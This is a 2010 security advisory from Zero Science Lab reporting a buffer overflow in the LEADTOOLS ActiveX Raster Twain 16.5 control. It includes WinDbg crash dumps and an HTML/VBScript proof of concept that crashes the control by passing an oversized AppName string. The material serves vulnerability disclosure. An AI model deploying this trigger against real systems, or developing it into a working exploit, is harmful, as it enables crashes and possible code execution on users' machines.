LEADTOOLS ActiveX Raster Twain 16.5 Buffer Overflow

`  
LEADTOOLS ActiveX Raster Twain v16.5 (LtocxTwainu.dll) Remote Buffer Overflow PoC  
  
  
Vendor: LEAD Technologies, Inc.  
Product Web Page: http://www.leadtools.com  
Affected Version: 16.5.0.2  
  
Summary: With LEADTOOLS you can control any scanner, digital camera  
or capture card that has a TWAIN (32 and 64 bit) device driver.  
High-level acquisition support is included for ease of use while  
low-level functionality is provided for flexibility and control in  
even the most demanding scanning applications.  
  
Desc: The Raster Twain Object Library suffers from a buffer overflow  
vulnerability because it fails to check the boundry of the user input.  
  
  
Tested On: Microsoft Windows XP Professional SP3 (EN)  
Windows Internet Explorer 8.0.6001.18702  
RFgen Mobile Development Studio 4.0.0.06 (Enterprise)  
  
  
===============================================================  
  
(2c4.2624): Access violation - code c0000005 (first chance)  
First chance exceptions are reported before any exception handling.  
This exception may be expected and handled.  
eax=00130041 ebx=100255bc ecx=01649000 edx=00183984 esi=0013ef6c edi=00000000  
eip=7c912f4e esp=0013eda8 ebp=0013eda8 iopl=0 nv up ei pl nz na pe nc  
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206  
ntdll!wcscpy+0xe:  
7c912f4e 668901 mov word ptr [ecx],ax ds:0023:01649000=????  
0:000> g  
(2c4.2624): Access violation - code c0000005 (first chance)  
First chance exceptions are reported before any exception handling.  
This exception may be expected and handled.  
eax=00410039 ebx=00410039 ecx=00150000 edx=00150608 esi=00150000 edi=00410041  
eip=7c96c540 esp=0013f220 ebp=0013f228 iopl=0 nv up ei pl nz na pe nc  
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206  
ntdll!RtlpNtMakeTemporaryKey+0x6a74:  
7c96c540 807b07ff cmp byte ptr [ebx+7],0FFh ds:0023:00410040=??  
  
==================================================================  
  
  
Registers:  
--------------------------------------------------  
EIP 7C912F4E  
EAX 00130041  
EBX 100255BC -> 10014840 -> Asc: @H@H  
ECX 01649000  
EDX 001839DC -> Uni: AAAAAAAAAAAAAAAAAAAAAAAAA  
EDI 00000000  
ESI 0013EF6C -> BAAD0008  
EBP 0013EDA8 -> 0013EDDC  
ESP 0013EDA8 -> 0013EDDC  
  
--  
  
EIP 7C96C540  
EAX 00410039  
EBX 00410039  
ECX 00150000 -> 000000C8  
EDX 00150608 -> 7C97B5A0  
EDI 00410041  
ESI 00150000 -> 000000C8  
EBP 0013F228 -> 0013F278  
ESP 0013F220 -> 00150000  
  
  
ArgDump:  
--------------------------------------------------  
EBP+8 016479B0 -> Uni: AAAAAAAAAAAAAAAAAAAAAAAAA  
EBP+12 0018238C -> Uni: AAAAAAAAAAAAAAAAAAAAAAAAA  
EBP+16 00000000  
EBP+20 0013EF6C -> BAAD0008  
EBP+24 100255BC -> 10014840 -> Asc: @H@H  
EBP+28 0013EDB8 -> 00000000  
  
--  
  
EBP+8 00150000 -> 000000C8  
EBP+12 00410039  
EBP+16 7C96DBA4 -> Asc: RtlGetUserInfoHeap  
EBP+20 00000000  
EBP+24 00410041  
EBP+28 7C80FF12 -> 9868146A  
  
  
CompanyName LEAD Technologies, Inc.  
FileDescription LEADTOOLS ActiveX Raster Twain (Win32)  
FileVersion 16,5,0,2  
InternalName LTRTNU  
LegalCopyright © 1991-2009 LEAD Technologies, Inc.  
OriginalFileName LTRTNU.DLL  
ProductName LEADTOOLS® for Win32  
ProductVersion 16.5.0.0  
  
  
Report for Clsid: {00165752-B1BA-11CE-ABC6-F5B2E79D9E3F}  
RegKey Safe for Script: True  
RegKey Safe for Init: True  
Implements IObjectSafety: False  
  
  
Exception Code: ACCESS_VIOLATION  
  
Disasm: 7C912F4E MOV [ECX],AX (ntdll.dll)  
Disasm: 7C96C540 CMP BYTE PTR [EBX+7],FF (ntdll.dll)  
  
  
Exception Code: BREAKPOINT  
  
Disasm: 7C90120E INT3 (ntdll.dll)  
  
Seh Chain:  
--------------------------------------------------  
1 7C839AC0 KERNEL32.dll  
2 FC2950 VBSCRIPT.dll  
3 7C90E900 ntdll.dll  
  
  
7C912F4E MOV [ECX],AX <--- CRASH  
7C96C540 CMP BYTE PTR [EBX+7],FF <--- CRASH  
7C90120F RETN <--- CRASH  
  
  
==================================================================  
  
  
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
liquidworm gmail com  
  
Zero Science Lab - http://www.zeroscience.mk  
  
24.08.2010  
  
  
Zero Science Lab Advisory ID: ZSL-2010-4960  
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4960.php  
  
  
  
PoC:  
  
  
<object classid='clsid:00165752-B1BA-11CE-ABC6-F5B2E79D9E3F' id='target' />  
<script language='vbscript'>  
  
targetFile = "C:\Program Files\RFGen40\LtocxTwainu.dll"  
prototype = "Property Let AppName As String"  
memberName = "AppName"  
progid = "LTRASTERTWAINLib_U.LEADRasterTwain_U"  
argCount = 1  
  
arg1=String(9236, "A")  
  
target.AppName = arg1  
  
</script>  
`